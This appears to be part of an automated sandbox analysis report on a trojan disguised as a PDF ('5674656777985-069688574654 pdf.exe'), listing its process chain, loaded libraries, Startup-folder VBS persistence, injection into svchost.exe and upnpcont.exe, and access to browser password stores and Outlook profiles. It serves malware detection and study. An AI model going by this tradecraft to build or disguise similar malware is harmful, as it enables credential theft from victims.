                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D2F02_2_0325D2F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032856302_2_03285630
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033095C32_2_033095C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD22_2_03203FD2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD52_2_03203FD5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 107 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: String function: 00366AC0 appears 42 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: String function: 0036F8A0 appears 35 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: String function: 0035EC2F appears 68 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: String function: 00D0F8A0 appears 35 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: String function: 00D06AC0 appears 42 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: String function: 00CFEC2F appears 68 times
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/7@5/5
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038CE7A GetLastError,FormatMessageW,0_2_0038CE7A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037AB84 AdjustTokenPrivileges,CloseHandle,0_2_0037AB84
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0037B134
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1AB84 AdjustTokenPrivileges,CloseHandle,1_2_00D1AB84
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00D1B134
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0038E1FD
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00386532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00386532
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0039C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0039C18C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0034406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0034406B
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeFile created: C:\Users\user\AppData\Local\retrofitJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeFile created: C:\Users\user\AppData\Local\Temp\autE4DE.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2511145084.00000000028BF000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2511278382.00000000028E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5674656777985-069688574654 pdf.exeReversingLabs: Detection: 76%
                    Source: 5674656777985-069688574654 pdf.exeVirustotal: Detection: 55%
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeFile read: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeProcess created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeProcess created: C:\Windows\SysWOW64\upnpcont.exe "C:\Windows\SysWOW64\upnpcont.exe"
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeProcess created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe" Jump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeProcess created: C:\Windows\SysWOW64\upnpcont.exe "C:\Windows\SysWOW64\upnpcont.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\upnpcont.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: 5674656777985-069688574654 pdf.exeStatic file information: File size 1189888 > 1048576
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XzXxPWzavnqD.exe, 00000009.00000002.3082674785.00000000005FE000.00000002.00000001.01000000.00000007.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3082673027.00000000005FE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: upnpcont.pdbGCTL source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdb source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: svchost.pdbUGP source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: upnpcont.pdb source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
